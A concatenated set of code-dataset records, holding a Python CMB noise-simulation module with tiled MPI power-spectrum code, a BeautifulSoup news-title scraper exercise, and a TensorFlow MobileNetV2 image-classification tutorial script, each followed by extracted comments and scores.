seedgen_args = seedgen_args + (LARGE_SCALE_TILE_NUM,) # dummy "tile_idx" for full sky random draw is 103,094
seed = seedgen.get_tiled_noise_seed(*seedgen_args)
print(f'Seed: {seed}')
# generate the noise and sht to real space
oshape = (ncomp,) + oshape
omap = curvedsky.rand_map(oshape, covar.wcs, covar, lmax=covar.shape[-1], dtype=covar.dtype, seed=seed)
omap = omap.reshape((num_arrays, 1, num_pol) + oshape[-2:])
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0 ] /= np.sqrt(ivar[ivar != 0])
return omap
def get_tiled_noise_covsqrt_mpi(imap, ivar=None, mask=None, width_deg=4., height_deg=4., delta_ell_smooth=400, ledges=None,
tiled_mpi_manager=None, verbose=True):
'''Generate the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
# if ivar is not None, whiten the imap data using ivar
if ivar is not None:
assert np.all(ivar >= 0)
imap = utils.get_whitened_noise_map(imap, ivar)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert imap.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
imap = utils.atleast_nd(imap, 5) # make data 5d
# filter map prior to tiling, get the c_ells
# imap is masked here, as part of the filtering
if mask is None:
mask = enmap.ones(imap.shape[-2:], wcs=imap.wcs)
if ledges is None:
ledges = np.arange(0, 10_000, maps.minimum_ell(imap.shape, imap.wcs)+1)
mask = mask.astype(imap.dtype)
imap, cov_1D = utils.ell_flatten(imap, mask=mask, ledges=ledges, return_cov=True)
# get the tiled data, tiled mask
imap = tiled_ndmap(imap, width_deg=width_deg, height_deg=height_deg)
sq_f_sky = imap.set_unmasked_tiles(mask, return_sq_f_sky=True)
imap = imap.to_tiled()
# # explicitly passing tiled=False and self.ishape will check that mask.shape and imap.ishape are compatible
# mask = imap.sametiles(mask, tiled=False).to_tiled()
else:
imap = None
# mask = None
sq_f_sky = None
# parallel code
imap = tiled_mpi_manager.Scatterv_tiled_ndmap(imap)
# mask = tiled_mpi_manager.Scatterv_tiled_ndmap(mask)
apod = imap.apod()
sq_f_sky = tiled_mpi_manager.Scatterv(sq_f_sky)
# # serial code
# if tiled_mpi_manager.is_root:
# my, mx = mcm.get_vecs_from_outer_mask(apod)
# invmcm = mcm.get_inv_mcm(my, arr2=mx, verbose=verbose)
# else:
# invmcm = None
# # parallel code
# invmcm = tiled_mpi_manager.Bcast(invmcm)
# get component shapes
num_arrays, num_splits, num_pol = imap.shape[1:4] # shape is (num_tiles, num_arrays, num_splits, num_pol, ...)
ncomp = num_arrays * num_pol
nspec = utils.triangular(ncomp)
# make the output PS map. imap.shape[-2:] is the tile shape
omap = np.zeros((imap.num_tiles, nspec) + imap.shape[-2:], dtype=imap.dtype)
# quick serial code
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Splits: {num_splits}, Number of Pols.: {num_pol}')
# parallel code
# cycle through the tiles
for i, n in enumerate(imap.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, imap.numx*imap.numy-1))
# get 2d tile geometry and modlmap, if the declination has changed
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change
_, ewcs = imap.get_tile_geometry(n)
# if i == 0:
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# else:
# if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
# modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype)
# prev_ewcs = ewcs
# get the 2d tile PS, shape is (num_arrays, num_splits, num_pol, ny, nx)
# so trace over component -4
# this normalization is different than DR4 but avoids the need to save num_splits metadata, and we
# only ever simulate splits anyway...
smap = enmap.fft(enmap.ndmap(imap[i]*apod, wcs=ewcs), normalize='phys')
smap = np.einsum('...miayx,...nibyx->...manbyx', smap, np.conj(smap)).real / num_splits
# # decouple mcm
# if verbose:
# print('Decoupling modes')
# smap = np.einsum('...YXyx,...yx->...YX', invmcm, smap)
if verbose:
print(f'Shape: {smap.shape}')
# iterate over spectra
for j in range(nspec):
# get array, pol indices
comp1, comp2 = utils.triu_pos(j, ncomp)
map_index_1, pol_index_1 = divmod(comp1, num_pol)
map_index_2, pol_index_2 = divmod(comp2, num_pol)
# whether we are on the main diagonal
diag = comp1 == comp2
# get this 2D PS and apply correct geometry for this tile
power = smap[map_index_1, pol_index_1, map_index_2, pol_index_2]
power = enmap.ndmap(power, wcs=ewcs)
# # smooth the power spectrum. only use radial fit and log for autos
# # cross including intensity have atmospheric noise to higher ell
# if pol_index_1 == 0 or pol_index_2 == 0:
# lmin = 300
# lknee_guess = 3000
# else:
# lmin = 30
# lknee_guess = 500
# smooth the 2D PS
if delta_ell_smooth > 0:
power = covtools.smooth_ps_grid_uniform(power, delta_ell_smooth, diag=diag)
# skip smoothing if delta_ell_smooth=0 is passed as arg
elif delta_ell_smooth == 0:
if verbose:
print('Not smoothing')
else:
raise ValueError('delta_ell_smooth must be >= 0')
# update output 2D PS map
smap[map_index_1, pol_index_1, map_index_2, pol_index_2] = power
if not diag: # symmetry
smap[map_index_2, pol_index_2, map_index_1, pol_index_1] = power
# correct for f_sky from mask and apod windows
smap /= sq_f_sky[i]
# take covsqrt of current power, need to reshape so prepended dimensions are 2x2
smap = enmap.multi_pow(smap.reshape((ncomp, ncomp) + smap.shape[-2:]), 0.5, axes=(-4,-3))
# get upper triu of the covsqrt for efficient disk-usage
omap[i] = utils.to_flat_triu(smap, axis1=0, axis2=1, flat_triu_axis=0)
omap = imap.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# serial code
if tiled_mpi_manager.is_root:
return omap, ledges, cov_1D
else:
return None, None
def get_tiled_noise_sim_mpi(covsqrt, ivar=None, flat_triu_axis=1, num_arrays=None, tile_lfunc=None, ledges=None, cov_1D=None,
split=None, seed=None, seedgen_args=None, lowell_seed=False, tiled_mpi_manager=None, verbose=True):
'''Generate a sim from the 2d noise spectra for each of the tiles
'''
# get mpi manager
if tiled_mpi_manager is None:
tiled_mpi_manager = mpi.TiledMPIManager(mpi=False)
# serial code
if tiled_mpi_manager.is_root:
t0 = time.time()
# get ivar, and num_arrays if necessary
if ivar is not None:
assert np.all(ivar >= 0)
# make data 5d, with prepended shape (num_arrays, num_splits, num_pol)
assert ivar.ndim in range(2, 6), 'Data must be broadcastable to shape (num_arrays, num_splits, num_pol, ny, nx)'
ivar = utils.atleast_nd(ivar, 5) # make data 5d
if num_arrays is not None:
assert num_arrays == ivar.shape[0], 'Introspection of ivar shape gives different num_arrays than num_arrays arg'
num_arrays = ivar.shape[0]
else:
assert num_arrays is not None, 'If ivar not passed, must pass num_arrays as arg'
if cov_1D is not None:
assert ledges is not None, 'Must pass ledges if passing cov_1D to filter'
assert len(ledges) == cov_1D.shape[-1] + 1, 'Must be n_ell+1 ledges'
assert covsqrt.tiled, 'Covsqrt must be tiled'
t1 = time.time(); print(f'Init time: {np.round(t1-t0, 3)}')
else:
covsqrt = None
num_arrays = None
# parallel code
covsqrt = tiled_mpi_manager.Scatterv_tiled_ndmap(covsqrt)
num_arrays = tiled_mpi_manager.bcast(num_arrays)
# get component shapes
ncomp = utils.triangular_idx(covsqrt.shape[flat_triu_axis])
num_pol = ncomp // num_arrays
# make the output sim map. covsqrt.shape[-2:] is the tile shape
omap = np.zeros((covsqrt.num_tiles, num_arrays, 1, num_pol) + covsqrt.shape[-2:], dtype=covsqrt.dtype)
if tiled_mpi_manager.is_root and verbose:
print(f'Number of Arrays: {num_arrays}, Number of Pols.: {num_pol}')
# cycle through the tiles
for i, n in enumerate(covsqrt.unmasked_tiles):
if verbose:
print('Doing tile {} of {}'.format(n, covsqrt.numx*covsqrt.numy-1))
# get 2d tile geometry
eshape, ewcs = covsqrt.get_tile_geometry(n)
# get the 2D PS from covsqrt
# subtract 1 from flat_triu_axis since we are doing covsqrt[i]
smap = utils.from_flat_triu(covsqrt[i], axis1=0, axis2=1, flat_triu_axis=flat_triu_axis-1)
if verbose:
print(f'Shape: {smap.shape}')
# apply a filter if passed, and if declination has changed build new filter.
# modlmap calls extent(..., signed=True), so this is the fastest way to check for a change.
# since modifying modes, not PS, use lfunc(...)**0.5; ie lfunc defines how one would modify
# the PS the modes are drawn from
if tile_lfunc is not None:
if i == 0:
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
else:
if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)):
f_ell = tile_lfunc(enmap.modlmap(eshape, ewcs).astype(covsqrt.dtype))**0.5
prev_ewcs = ewcs
smap *= f_ell
# determine the seed. use a seedgen if seedgen_args is not None
if seedgen_args is not None:
# if the split is the seedgen setnum, prepend it to the seedgen args
if len(seedgen_args) == 3: # sim_idx, data_model, qid
seedgen_args = (split,) + seedgen_args
else:
assert len(seedgen_args) == 4 # set_idx, sim_idx, data_model, qid
seedgen_args_tile = seedgen_args + (n,)
seed = seedgen.get_tiled_noise_seed(*seedgen_args_tile, lowell_seed=lowell_seed)
if verbose:
print(f'Seed: {seed}')
# generate the noise and fft to real space
if seed is not None:
np.random.seed(seed)
# determine dtype
if np.dtype(covsqrt.dtype).itemsize == 4:
rand_dtype = np.complex64
elif np.dtype(covsqrt.dtype).itemsize == 8:
rand_dtype = np.complex128
else:
raise TypeError('Only float32 and float64 implemented for now')
# simulate
randn = enmap.rand_gauss_harm((ncomp,) + smap.shape[-2:], ewcs).astype(rand_dtype) # stuck with this casting
smap = enmap.map_mul(smap, randn)
smap = enmap.ifft(smap, normalize='phys').real
smap = smap.reshape((num_arrays, 1, num_pol) + smap.shape[-2:]) # add a dimension for split
# update output map
omap[i] = smap
omap = covsqrt.sametiles(omap)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# must untile serially
if tiled_mpi_manager.is_root:
t2 = time.time(); print(f'Tile sim time: {np.round(t2-t1, 3)}')
omap = omap.from_tiled(power=0.5, return_as_enmap=False)
t3 = time.time(); print(f'Stitch time: {np.round(t3-t2, 3)}')
# determine whether to filter
if tiled_mpi_manager.is_root:
to_filter = cov_1D is not None
else:
to_filter = None
to_filter = tiled_mpi_manager.bcast(to_filter)
# prepare omap for parallel filtering, if necessary
if to_filter:
if tiled_mpi_manager.is_root:
assert (num_arrays, num_pol) == cov_1D.shape[:-1], 'cov_1D shape does not match (num_arrays, num_pol, ...)'
assert (num_arrays, 1, num_pol) == omap.shape[:-2], 'omap shape does not match (num_arrays, 1, num_pol, ...)'
cov_1D = cov_1D.reshape(-1, *cov_1D.shape[-1:])
omap = omap.reshape(-1, *omap.shape[-2:])
ledges = tiled_mpi_manager.Bcast(ledges)
cov_1D = tiled_mpi_manager.Scatterv(cov_1D)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(omap)
else:
ledges = tiled_mpi_manager.Bcast(None)
cov_1D = tiled_mpi_manager.Scatterv(None)
omap = tiled_mpi_manager.Scatterv_tiled_ndmap(None)
# do filtering in parallel to save a little time, can only scatter maps to filter unfortunately
for i in range(len(cov_1D)):
ilfunc = utils.interp1d_bins(ledges, cov_1D[i], bounds_error=False)
olfunc = lambda l: np.sqrt(ilfunc(l))
omap[i] = utils.ell_filter(omap[i], olfunc)
omap = tiled_mpi_manager.Gatherv_tiled_ndmap(omap)
# do ivar-weighting serially
if tiled_mpi_manager.is_root:
# reshape omap back to (num_arrays, 1, num_pol, ...)
omap = omap.reshape(num_arrays, 1, num_pol, *omap.shape[-2:]).to_ndmap()
t4 = time.time(); print(f'Filter time: {np.round(t4-t3, 3)}')
# if ivar is not None, unwhiten the imap data using ivar
if ivar is not None:
splitslice = utils.get_take_indexing_obj(ivar, split, axis=-4)
ivar = ivar[splitslice]
ivar = np.broadcast_to(ivar, omap.shape)
omap[ivar != 0] /= np.sqrt(ivar[ivar != 0])
t5 = time.time(); print(f'Ivar-weight time: {np.round(t5-t4, 3)}')
return omap
else:
return None | en | 0.69915 | # harcoded constants Get the 1D global, isotropic power spectra to draw sims from later. Ivar maps, if passed are used to pre-whiten the maps in pixel-space by their high-ell white noise level prior to measuring power spectra. Parameters ---------- imap : enmap.ndmap Map with shape ([num_arrays, num_splits, num_pol,] ny, nx) ivar : enmap.ndmap, optional Inverse-variance maps for imap with shape([num_arrays, num_splits, 1,], ny, nx), by default None mask : enmap.ndmap, optional A map-space window to apply to imap before calculting power spectra, by default None N : int, optional Perform a rolling average over the spectra with this width in ell, by default 5 lmax : int, optional Bandlimit of measured spectra, by default 1000 Returns ------- enmap.ndmap A set of power spectra from the crosses of array, pol pairs. Only saves upper-triangular matrix elements, so e.g. if 2 arrays and 3 pols, output shape is (21, lmax+1) # if ivar is not None, whiten the imap data using ivar # make data 5d, with prepended shape (num_arrays, num_splits, num_pol) # make data 5d # get the mask, pixsizemap, and initialized output # upper triangular # get alms of each array, split, pol #np.zeros(imap.shape[:3] + ls.shape, dtype=imap.dtype) # iterate over spectra # get array, pol indices # get cross power # smooth # assign # normalize by area and return final object Get a noise realization from the 1D global, isotropic power spectra generated in get_iso_curvedsky_noise_covar. If power spectra were prewhitened with ivar maps, same ivar maps must be passed to properly weight sims in pixel space. Parameters ---------- covar : enmap.ndmap 1D global, isotropic power spectra to draw sim from. Shape must be (nspec, lmax+1), where nspec is a triangular number ivar : enmap.ndmap, optional Inverse-variance map to weight output sim by in pixel-space with shape([num_arrays, num_splits, 1,], ny, nx), by default None flat_triu_axis : int, optional Axis of covar that carries the flattened upper-triangle of the covariance matrix, by default 0 oshape : at-least-length-2 iterable, optional If ivar is not passed, the shape of the sim, by default None num_arrays : int, optional If ivar is not passed the number of arrays that generated covar, by default None lfunc : function, optional A transfer function to modulate sim power in harmonic space, by default None split : int, optional The index of ivar corresponding to the desired split, by default None seed : Random seed for spectra, optional If seedgen_args is None then the maps will have this seed, by default None seedgen_args : length-4 tuple, optional A tuple containing (split, map_id, data_model, list-of-qids) to pass to seedgen.get_tiled_noise_seed(...), by default None Returns ------- enmap.ndmap A shape([num_arrays, 1, num_pol,] ny, nx) 1D global, isotropic noise simulation of given split in given array # get ivar, and num_arrays if necessary # make data 5d, with prepended shape (num_arrays, num_splits, num_pol) # make data 5d # get component shapes and reshape covar # assumes covar flat_triu_axis is axis 0 # get the 1D PS from covar # apply a filter if passed # determine the seed. use a seedgen if seedgen_args is not None # if the split is the seedgen setnum, prepend it to the seedgen args # sim_idx, data_model, qid # set_idx, sim_idx, data_model, qid: # dummy "tile_idx" for full sky random draw is 103,094 # generate the noise and sht to real space # if ivar is not None, unwhiten the imap data using ivar Generate the 2d noise spectra for each of the tiles # get mpi manager # serial code # if ivar is not None, whiten the imap data using ivar # make data 5d, with prepended shape (num_arrays, num_splits, num_pol) # make data 5d # filter map prior to tiling, get the c_ells # imap is masked here, as part of the filtering # get the tiled data, tiled mask # # explicitly passing tiled=False and self.ishape will check that mask.shape and imap.ishape are compatible # mask = imap.sametiles(mask, tiled=False).to_tiled() # mask = None # parallel code # mask = tiled_mpi_manager.Scatterv_tiled_ndmap(mask) # # serial code # if tiled_mpi_manager.is_root: # my, mx = mcm.get_vecs_from_outer_mask(apod) # invmcm = mcm.get_inv_mcm(my, arr2=mx, verbose=verbose) # else: # invmcm = None # # parallel code # invmcm = tiled_mpi_manager.Bcast(invmcm) # get component shapes # shape is (num_tiles, num_arrays, num_splits, num_pol, ...) # make the output PS map. imap.shape[-2:] is the tile shape # quick serial code # parallel code # cycle through the tiles # get 2d tile geometry and modlmap, if the declination has changed # modlmap calls extent(..., signed=True), so this is the fastest way to check for a change # if i == 0: # modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype) # else: # if not np.all(enmap.extent(eshape, ewcs, signed=True) == enmap.extent(eshape, prev_ewcs, signed=True)): # modlmap = enmap.modlmap(eshape, ewcs).astype(imap.dtype) # prev_ewcs = ewcs # get the 2d tile PS, shape is (num_arrays, num_splits, num_pol, ny, nx) # so trace over component -4 # this normalization is different than DR4 but avoids the need to save num_splits metadata, and we # only ever simulate splits anyway... # # decouple mcm # if verbose: # print('Decoupling modes') # smap = np.einsum('...YXyx,...yx->...YX', invmcm, smap) # iterate over spectra # get array, pol indices # whether we are on the main diagonal # get this 2D PS and apply correct geometry for this tile # # smooth the power spectrum. only use radial fit and log for autos # # cross including intensity have atmospheric noise to higher ell # if pol_index_1 == 0 or pol_index_2 == 0: # lmin = 300 # lknee_guess = 3000 # else: # lmin = 30 # lknee_guess = 500 # smooth the 2D PS # skip smoothing if delta_ell_smooth=0 is passed as arg # update output 2D PS map # symmetry # correct for f_sky from mask and apod windows # take covsqrt of current power, need to reshape so prepended dimensions are 2x2 # get upper triu of the covsqrt for efficient disk-usage # serial code Generate a sim from the 2d noise spectra for each of the tiles # get mpi manager # serial code # get ivar, and num_arrays if necessary # make data 5d, with prepended shape (num_arrays, num_splits, num_pol) # make data 5d # parallel code # get component shapes # make the output sim map. covsqrt.shape[-2:] is the tile shape # cycle through the tiles # get 2d tile geometry # get the 2D PS from covsqrt # subtract 1 from flat_triu_axis since we are doing covsqrt[i] # apply a filter if passed, and if declination has changed build new filter. # modlmap calls extent(..., signed=True), so this is the fastest way to check for a change. # since modifying modes, not PS, use lfunc(...)**0.5; ie lfunc defines how one would modify # the PS the modes are drawn from # determine the seed. use a seedgen if seedgen_args is not None # if the split is the seedgen setnum, prepend it to the seedgen args # sim_idx, data_model, qid # set_idx, sim_idx, data_model, qid # generate the noise and fft to real space # determine dtype # simulate # stuck with this casting # add a dimension for split # update output map # must untile serially # determine whether to filter # prepare omap for parallel filtering, if necessary # do filtering in parallel to save a little time, can only scatter maps to filter unfortunately # do ivar-weighting serially # reshape omap back to (num_arrays, 1, num_pol, ...) # if ivar is not None, unwhiten the imap data using ivar | 2.139885 | 2 |
python_news.py | rayjustinhuang/BitesofPy | 0 | 6616799 | <filename>python_news.py
from collections import namedtuple
from bs4 import BeautifulSoup
import requests
# feed = https://news.python.sc/, to get predictable results we cached
# first two pages - use these:
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index.html
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index2.html
Entry = namedtuple('Entry', 'title points comments')
def _create_soup_obj(url):
"""Need utf-8 to properly parse emojis"""
resp = requests.get(url)
resp.encoding = "utf-8"
return BeautifulSoup(resp.text, "html.parser")
def get_top_titles(url, top=5):
"""Parse the titles (class 'title') using the soup object.
Return a list of top (default = 5) titles ordered descending
by number of points and comments.
"""
soup = _create_soup_obj(url)
# you code
titles = soup.find_all('span', class_='title')
points = soup.find_all('span', class_='controls')
title_list = []
for title, point in zip(titles, points):
p = int(point.find('span', class_='smaller').text.strip().split()[0])
c = int(point.find('span', class_='smaller').text.strip().split()[-2])
if title.find('span',class_='smaller') == None:
t = title.find('a').text
title_list.append(Entry(t, p, c))
continue
t = title.find('a').text + " " + title.find('span', class_='smaller').text
title_list.append(Entry(t, p, c))
return sorted(title_list, key = lambda x: (x[1], x[2]), reverse=True)[:top] | <filename>python_news.py
from collections import namedtuple
from bs4 import BeautifulSoup
import requests
# feed = https://news.python.sc/, to get predictable results we cached
# first two pages - use these:
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index.html
# https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index2.html
Entry = namedtuple('Entry', 'title points comments')
def _create_soup_obj(url):
"""Need utf-8 to properly parse emojis"""
resp = requests.get(url)
resp.encoding = "utf-8"
return BeautifulSoup(resp.text, "html.parser")
def get_top_titles(url, top=5):
"""Parse the titles (class 'title') using the soup object.
Return a list of top (default = 5) titles ordered descending
by number of points and comments.
"""
soup = _create_soup_obj(url)
# you code
titles = soup.find_all('span', class_='title')
points = soup.find_all('span', class_='controls')
title_list = []
for title, point in zip(titles, points):
p = int(point.find('span', class_='smaller').text.strip().split()[0])
c = int(point.find('span', class_='smaller').text.strip().split()[-2])
if title.find('span',class_='smaller') == None:
t = title.find('a').text
title_list.append(Entry(t, p, c))
continue
t = title.find('a').text + " " + title.find('span', class_='smaller').text
title_list.append(Entry(t, p, c))
return sorted(title_list, key = lambda x: (x[1], x[2]), reverse=True)[:top] | en | 0.756138 | # feed = https://news.python.sc/, to get predictable results we cached # first two pages - use these: # https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index.html # https://bites-data.s3.us-east-2.amazonaws.com/news.python.sc/index2.html Need utf-8 to properly parse emojis Parse the titles (class 'title') using the soup object. Return a list of top (default = 5) titles ordered descending by number of points and comments. # you code | 3.275015 | 3 |
Image_classification.py | imartinezl/picnic-hackathon-2019 | 1 | 6616800 | <reponame>imartinezl/picnic-hackathon-2019
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 16:52:40 2019
@author: imartinez
"""
# Tensorflow tutorial on image classification and image load
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
import math
tf.enable_eager_execution()
tf.VERSION
x = tf.random_uniform([3, 3])
print("Is there a GPU available: "),
print(tf.test.is_gpu_available())
print("Is the Tensor on GPU #0: "),
print(x.device.endswith('GPU:0'))
# Tensor Slices
def function(num):
print(type(num))
return tf.square(num) + 1
ds_tensors = tf.data.Dataset.from_tensor_slices([1, 2, 3, 4, 5, 6])
ds_tensors = ds_tensors.map(function).shuffle(2).batch(2)
print('Elements of ds_tensors:')
for x in ds_tensors:
print(x)
# Gradient Calculation
x = tf.constant([[1.0, 2.0], [3.0, 4.0]])
#x = tf.ones((2, 2))
with tf.GradientTape(persistent=False) as t:
t.watch(x)
y = tf.reduce_sum(tf.square(x))
z = tf.multiply(y, y)
dz_dx = t.gradient(z, x)
for i in [0, 1]:
for j in [0, 1]:
print(dz_dx[i][j].numpy())
# =============================================================================
# TENSORFLOW PIPELINE
# =============================================================================
data = pd.read_csv('train.tsv', sep='\t')
image_count = data.shape[0]
label_names = data.label.unique()
label_to_index = dict((name, index) for index, name in enumerate(label_names))
data['label_index'] = [label_to_index[label] for label in data.label]
# =============================================================================
# A dataset of paths
# =============================================================================
image_paths = "./train/" + data.file.values
path_ds = tf.data.Dataset.from_tensor_slices(image_paths)
print('shape: ', repr(path_ds.output_shapes))
print('type: ', path_ds.output_types)
print()
print(path_ds)
# =============================================================================
# A dataset of images
# =============================================================================
def preprocess_image(image):
image = tf.image.decode_jpeg(image, channels=3)
image = tf.image.resize_images(image, [192, 192])
image /= 255.0 # normalize to [0,1] range
return image
def load_and_preprocess_image(path):
image = tf.read_file(path)
return preprocess_image(image)
AUTOTUNE = tf.data.experimental.AUTOTUNE
image_ds = path_ds.map(load_and_preprocess_image, num_parallel_calls=AUTOTUNE)
plt.figure(figsize=(8, 8))
for n, image in enumerate(image_ds.shuffle(20).take(4)):
plt.subplot(2, 2, n+1)
plt.imshow(image)
plt.grid(False)
plt.xticks([])
plt.yticks([])
# =============================================================================
# A dataset of (image, label) pairs
# =============================================================================
image_labels = data.label_index
label_ds = tf.data.Dataset.from_tensor_slices(tf.cast(image_labels, tf.int64))
for label in label_ds.take(10):
print(str(label.numpy()) + ' ' + label_names[label.numpy()])
image_label_ds = tf.data.Dataset.zip((image_ds, label_ds))
print('image shape: ', image_label_ds.output_shapes[0])
print('label shape: ', image_label_ds.output_shapes[1])
print('types: ', image_label_ds.output_types)
print()
print(image_label_ds)
image_label_ds = tf.data.Dataset.from_tensor_slices((image_paths, image_labels))
def load_and_preprocess_from_path_label(path, label):
return load_and_preprocess_image(path), label
image_label_ds = image_label_ds.map(load_and_preprocess_from_path_label)
image_label_ds
# Setting a shuffle buffer size as large as the dataset ensures that the data is
# completely shuffled.
ds = image_label_ds.shuffle(buffer_size=image_count)
ds = ds.repeat()
BATCH_SIZE = 32
ds = ds.batch(BATCH_SIZE)
# `prefetch` lets the dataset fetch batches, in the background while the model is training.
ds = ds.prefetch(buffer_size=AUTOTUNE)
ds
mobile_net = tf.keras.applications.MobileNetV2(input_shape=(192, 192, 3), include_top=False)
mobile_net.trainable=False
def change_range(image,label):
return 2*image-1, label
ds = ds.map(change_range)
image_batch, label_batch = next(iter(ds))
feature_map_batch = mobile_net(image_batch)
print(feature_map_batch.shape)
model = tf.keras.Sequential([
mobile_net,
tf.keras.layers.GlobalAveragePooling2D(),
tf.keras.layers.Dense(len(label_names))
])
logit_batch = model(image_batch).numpy()
print("min logit: ", logit_batch.min())
print("max logit: ", logit_batch.max())
print()
print("Shape:", logit_batch.shape)
model.compile(optimizer = tf.train.AdamOptimizer(),
loss = tf.keras.losses.sparse_categorical_crossentropy,
metrics = [tf.keras.metrics.categorical_accuracy])
len(model.trainable_variables)
model.summary()
steps_per_epoch = tf.ceil(len(image_paths)/BATCH_SIZE).numpy()
steps_per_epoch
model.fit(ds, epochs=1, steps_per_epoch=3)
| #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 1 16:52:40 2019
@author: imartinez
"""
# Tensorflow tutorial on image classification and image load
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
import math
tf.enable_eager_execution()
tf.VERSION
x = tf.random_uniform([3, 3])
print("Is there a GPU available: "),
print(tf.test.is_gpu_available())
print("Is the Tensor on GPU #0: "),
print(x.device.endswith('GPU:0'))
# Tensor Slices
def function(num):
print(type(num))
return tf.square(num) + 1
ds_tensors = tf.data.Dataset.from_tensor_slices([1, 2, 3, 4, 5, 6])
ds_tensors = ds_tensors.map(function).shuffle(2).batch(2)
print('Elements of ds_tensors:')
for x in ds_tensors:
print(x)
# Gradient Calculation
x = tf.constant([[1.0, 2.0], [3.0, 4.0]])
#x = tf.ones((2, 2))
with tf.GradientTape(persistent=False) as t:
t.watch(x)
y = tf.reduce_sum(tf.square(x))
z = tf.multiply(y, y)
dz_dx = t.gradient(z, x)
for i in [0, 1]:
for j in [0, 1]:
print(dz_dx[i][j].numpy())
# =============================================================================
# TENSORFLOW PIPELINE
# =============================================================================
data = pd.read_csv('train.tsv', sep='\t')
image_count = data.shape[0]
label_names = data.label.unique()
label_to_index = dict((name, index) for index, name in enumerate(label_names))
data['label_index'] = [label_to_index[label] for label in data.label]
# =============================================================================
# A dataset of paths
# =============================================================================
image_paths = "./train/" + data.file.values
path_ds = tf.data.Dataset.from_tensor_slices(image_paths)
print('shape: ', repr(path_ds.output_shapes))
print('type: ', path_ds.output_types)
print()
print(path_ds)
# =============================================================================
# A dataset of images
# =============================================================================
def preprocess_image(image):
image = tf.image.decode_jpeg(image, channels=3)
image = tf.image.resize_images(image, [192, 192])
image /= 255.0 # normalize to [0,1] range
return image
def load_and_preprocess_image(path):
image = tf.read_file(path)
return preprocess_image(image)
AUTOTUNE = tf.data.experimental.AUTOTUNE
image_ds = path_ds.map(load_and_preprocess_image, num_parallel_calls=AUTOTUNE)
plt.figure(figsize=(8, 8))
for n, image in enumerate(image_ds.shuffle(20).take(4)):
plt.subplot(2, 2, n+1)
plt.imshow(image)
plt.grid(False)
plt.xticks([])
plt.yticks([])
# =============================================================================
# A dataset of (image, label) pairs
# =============================================================================
image_labels = data.label_index
label_ds = tf.data.Dataset.from_tensor_slices(tf.cast(image_labels, tf.int64))
for label in label_ds.take(10):
print(str(label.numpy()) + ' ' + label_names[label.numpy()])
image_label_ds = tf.data.Dataset.zip((image_ds, label_ds))
print('image shape: ', image_label_ds.output_shapes[0])
print('label shape: ', image_label_ds.output_shapes[1])
print('types: ', image_label_ds.output_types)
print()
print(image_label_ds)
image_label_ds = tf.data.Dataset.from_tensor_slices((image_paths, image_labels))
def load_and_preprocess_from_path_label(path, label):
return load_and_preprocess_image(path), label
image_label_ds = image_label_ds.map(load_and_preprocess_from_path_label)
image_label_ds
# Setting a shuffle buffer size as large as the dataset ensures that the data is
# completely shuffled.
ds = image_label_ds.shuffle(buffer_size=image_count)
ds = ds.repeat()
BATCH_SIZE = 32
ds = ds.batch(BATCH_SIZE)
# `prefetch` lets the dataset fetch batches, in the background while the model is training.
ds = ds.prefetch(buffer_size=AUTOTUNE)
ds
mobile_net = tf.keras.applications.MobileNetV2(input_shape=(192, 192, 3), include_top=False)
mobile_net.trainable=False
def change_range(image,label):
return 2*image-1, label
ds = ds.map(change_range)
image_batch, label_batch = next(iter(ds))
feature_map_batch = mobile_net(image_batch)
print(feature_map_batch.shape)
model = tf.keras.Sequential([
mobile_net,
tf.keras.layers.GlobalAveragePooling2D(),
tf.keras.layers.Dense(len(label_names))
])
logit_batch = model(image_batch).numpy()
print("min logit: ", logit_batch.min())
print("max logit: ", logit_batch.max())
print()
print("Shape:", logit_batch.shape)
model.compile(optimizer = tf.train.AdamOptimizer(),
loss = tf.keras.losses.sparse_categorical_crossentropy,
metrics = [tf.keras.metrics.categorical_accuracy])
len(model.trainable_variables)
model.summary()
steps_per_epoch = tf.ceil(len(image_paths)/BATCH_SIZE).numpy()
steps_per_epoch
model.fit(ds, epochs=1, steps_per_epoch=3) | en | 0.55969 | #!/usr/bin/env python3 # -*- coding: utf-8 -*- Created on Mon Apr 1 16:52:40 2019 @author: imartinez # Tensorflow tutorial on image classification and image load #0: "), # Tensor Slices # Gradient Calculation #x = tf.ones((2, 2)) # ============================================================================= # TENSORFLOW PIPELINE # ============================================================================= # ============================================================================= # A dataset of paths # ============================================================================= # ============================================================================= # A dataset of images # ============================================================================= # normalize to [0,1] range # ============================================================================= # A dataset of (image, label) pairs # ============================================================================= # Setting a shuffle buffer size as large as the dataset ensures that the data is # completely shuffled. # `prefetch` lets 